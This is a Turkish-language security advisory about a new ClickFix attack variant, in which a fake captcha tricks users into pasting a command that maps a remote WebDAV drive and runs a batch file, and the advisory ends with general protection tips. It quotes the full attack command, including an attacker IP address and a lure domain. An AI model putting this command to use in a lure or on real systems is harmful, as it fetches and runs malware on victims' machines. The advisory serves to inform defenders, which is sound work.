Yeni ClickFix Saldırı Varyantı: Tehditler ve Korunma Yöntemleri
Siber güvenlik dünyasında, yeni tehditler sürekli olarak ortaya çıkmakta ve kullanıcılara potansiyel riskler sunmaktadır. Son tespit edilen ClickFix saldırı varyantı, saldırganların kullanıcıyı kendi cihazında zararlı bir komut çalıştırmaya ikna etmek için kullandıkları yeni bir taktikle dikkat çekmektedir.
Saldırı Nasıl Çalışıyor?
Bu saldırı varyantında, kullanıcıların “Win + R” kısayolunu kullanarak zararlı bir komut yürütmeleri teşvik ediliyor. Saldırganlar “net use” komutunu kullanarak, harici bir sunucudan bir ağ sürücüsü oluşturuyor. Ardından bu sürücüde yer alan bir “.cmd” toplu işlem dosyası çalıştırılıyor. Bu dosya, bir ZIP arşivini indirip çıkarıyor ve içinde zararlı mantık gizli olan meşru bir uygulama olan WorkFlowy’yi çalıştırıyor. Bu işlem, bir C2 (Command and Control) işareti ve nihai zararlı yazılım yükü için bir dropper işlevi görüyor.
Etkilenen Sistemler
İlk saldırı vektörü, kullanıcıların tıkladıkları “happyglamper[.]ro” gibi bir captcha mekanizması ile başlıyor. Kullanıcılara “Win + R” kısayolunu açmaları, ardından “Ctrl + V” ve “Enter” tuşlarına basmaları isteniyor. Bu, aşağıdaki komutu çalıştırıyor:
“cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:update.cmd” & net use Z: /deleteBu aşamada “net use” komutunun, harici bir sunucuya bağlanmak için kullanıldığını görmekteyiz. Saldırganlar, bu yöntemi kullanarak savunma mekanizmalarını aşmayı başarmaktadır. BuClickFix varyantı, Microsoft Defender for Endpoint gibi güvenlik yazılımları tarafından tespit edilemedi.
Çözüm ve Korunma
Kullanıcılar, bu tür saldırılara karşı korunmak için aşağıdaki adımları izlemelidir:
- Sistemlerinizi güncel tutun: Yazılımlarınızı ve işletim sisteminizi en son sürümlere yükseltin.
- Güvenlik yazılımlarınızı etkinleştirin: Güvenlik duvarı ve antivirüs yazılımlarınızı aktif hale getirin.
- Şüpheli bağlantılardan uzak durun: Bilinmeyen veya şüpheli web sitelerinden kaçının.
- Portları kapatın: Gereksiz servisleri devre dışı bırakın ve açık portları kapatın.
- Olayla ilgili bilgilendirme yapın: Çalışma ortamınızda kullanıcıları bilinçlendirin ve bu tür saldırılar hakkında bilgi verin.
Güvenliğinizi artırmak ve zararlı yazılımlara karşı önlem almak için bu önlemlere uymak son derece önemlidir. Unutmayın, siber tehditler sürekli evrim geçirmekte ve koruma stratejilerinizi sürekli güncellemeniz gerekmektedir.
